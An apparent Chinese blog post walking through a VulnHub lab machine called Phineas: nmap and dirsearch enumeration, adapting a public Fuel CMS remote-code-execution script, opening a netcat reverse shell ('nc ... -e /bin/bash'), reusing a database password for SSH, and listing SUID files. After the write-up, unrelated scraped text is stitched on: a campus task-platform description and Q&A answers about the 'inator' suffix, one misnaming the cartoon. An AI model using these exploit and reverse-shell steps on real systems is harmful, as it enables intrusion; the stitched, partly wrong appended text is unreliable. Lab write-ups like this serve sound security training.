VulnHub打靶记录——phineas

靶机下载地址:https://download.vulnhub.com/phineas/Phineas.ova

将靶机设置为NAT模式并启动。

主机发现&信息收集

nmap扫描本地网段

nmap -sn 192.168.17.0/24

在这里插入图片描述
133就是我们的目标靶机。

接着收集靶场信息:

nmap -sV -Pn -O 192.168.17.133

在这里插入图片描述
开放端口22,80,111,3306

直接访问80端口,发现无法访问,dirsearch默认字典也没扫出什么东西,使用 kali 自带的字典跑一下

dirsearch.py -u http://192.168.17.133 -e* -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

只发现 structure 目录,但还是访问不了,继续深度扫描查看 robots.txt文件,说明存在fuel目录
在这里插入图片描述
访问:http://192.168.17.133/structure/fuel/
跳转到:http://192.168.17.133/structure/fuel/start
在这里插入图片描述
再次对 /structure/fuel 进行深度扫描,发现目录
在这里插入图片描述
在此处猜测,有一个系统叫做fuel,只不过现在还没发现入口
在这里插入图片描述
本地搜索一下 fuel,发现是CMS,后面几个SQL 注入需要先登录
在这里插入图片描述
试一下第一个 RCE 脚本
在这里插入图片描述
保存到本地,修改一下脚本:
在这里插入图片描述
更改47138.py文件的 url 和删除代理
在这里插入图片描述
执行一下发现还是不行
在这里插入图片描述
估计是路径不对,把所有 /structure 后都加上 /fuel 看下

在访问 /structure/index.php/fuel/ 路径的时候发现了 fuel cms 登录界面
在这里插入图片描述
再次修改脚本中 URL 路径并执行
在这里插入图片描述
成功执行
在这里插入图片描述

nc反弹shell

目标靶机已安装 NC
在这里插入图片描述
攻击机:

nc -nlvp 4444

cmd:nc 192.168.17.133 4444 -e /bin/bash

用靶机的bash进行操作,把本机的bash推回来
在这里插入图片描述
反弹成功

查看配置文件,看有没有能登录的账号

在这里插入图片描述
开放了22端口,使用ssh链接,输入刚才保存的数据库的密码,发现可以进入
在这里插入图片描述
看有无管理员权限,发现无

sudo -l

sudo -l 列出目前用户可执行与无法执行的指令。

在这里插入图片描述
查找有 suid 属性权限的文件

find / -perm -u=s -type f 2>/dev/null

find / -perm /4000 -type f 2>/dev/null
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
校园悬赏任务平台对字典管理、论坛管理、任务资讯任务资讯公告管理、接取用户管理、任务管理、任务咨询管理、任务收藏管理、任务评价管理、任务订单管理、发布用户管理、管理员管理等进行集中化处理。经过前面自己查阅的网络知识,加上自己在学校课堂上学习的知识,决定开发系统选择小程序模式这种高效率的模式完成系统功能开发。这种模式让操作员基于浏览器的方式进行网站访问,采用的主流的Java语言这种面向对象的语言进行校园悬赏任务平台程序的开发,在数据库的选择上面,选择功能强大的Mysql数据库进行数据的存放操作。校园悬赏任务平台的开发让用户查看任务信息变得容易,让管理员高效管理任务信息。 校园悬赏任务平台具有管理员角色,用户角色,这几个操作权限。 校园悬赏任务平台针对管理员设置的功能有:添加并管理各种类型信息,管理用户账户信息,管理任务信息,管理任务资讯公告信息等内容。 校园悬赏任务平台针对用户设置的功能有:查看并修改个人信息,查看任务信息,查看任务资讯公告信息等内容。 系统登录功能是程序必不可少的功能,在登录页面必填的数据有两项,一项就是账号,另一项数据就是密码,当管理员正确填写并提交这二者数据之后,管理员就可以进入系统后台功能操作区。项目管理页面提供的功能操作有:查看任务,删除任务操作,新增任务操作,修改任务操作。任务资讯公告信息管理页面提供的功能操作有:新增任务资讯公告,修改任务资讯公告,删除任务资讯公告操作。任务资讯公告类型管理页面显示所有任务资讯公告类型,在此页面既可以让管理员添加新的任务资讯公告信息类型,也能对已有的任务资讯公告类型信息执行编辑更新,失效的任务资讯公告类型信息也能让管理员快速删除。
### 回答1: "Inator"这个后缀通常用于创造具有幽默感或幽默意味的虚构机器或设备的名称。例如,在动画电视节目“Phineas和Ferb”中,角色经常发明具有名称的新小工具,例如“Shrink-inator”或“Time-Travelinator”。后缀的意思是表明该机器或设备具有极高的效率或功率,能够执行特定的任务。 ### 回答2: "Inator"是一个英语创造的后缀,经常用于组合成新词。这个后缀源自于美国动画片《菠萝蜜家庭》中的一个角色,名为Doofenshmirtz。这个角色是个邪恶科学家,他经常给他的发明品加上"Inator"后缀,因此这个后缀就逐渐成为了一个有趣的造词方式。 通常情况下,"Inator"后缀被用于表示一种发明或设备,通常会有一些特定的功能或目的。例如,"冰冻射线器"(Freeze-inator)指的是一种可以冻结物体的装置,"缩小射线器"(Shrink-inator)是一种能缩小物体的装置。这些词汇被广泛运用在动画片、游戏和流行文化中,以营造轻松幽默的氛围。 总而言之,"Inator"是一个用于创造有趣新词的后缀,常用于形容邪恶科学家在动画片《菠萝蜜家庭》中的发明品。它具有一定的幽默性,并被广泛用于流行文化中。 ### 回答3: "Inator"是一个由英语单词"inator"衍生而来的后缀,常用于虚构或模拟新的设备、机器或技术。这个后缀常用于动画、电影、漫画和游戏等媒体中,用于给角色或物体命名,以显示它们具有超越常规能力或功能的想象力。"Inator"通常拥有强大而独特的特性,可能是为了控制、改变或破坏某些事物。在一些动画作品中,主要反派角色常常会拥有一个以"inator"结尾的设备,以增加其威胁和危险性,从而引发故事的冲突和紧张氛围。总之,"inator"在娱乐文化中成为了一个常见的字尾,用于创造具有超强功能和潜力的虚构设备或技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值